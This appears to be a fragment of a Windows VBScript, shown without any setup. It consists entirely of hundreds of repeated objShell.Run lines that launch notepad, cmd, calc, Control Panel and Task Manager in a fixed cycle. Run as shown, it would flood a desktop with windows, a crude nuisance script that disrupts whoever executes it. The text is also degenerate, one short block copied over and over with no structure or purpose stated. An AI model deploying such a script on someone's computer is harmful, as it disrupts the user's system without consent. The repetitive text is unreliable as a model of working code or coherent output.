objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
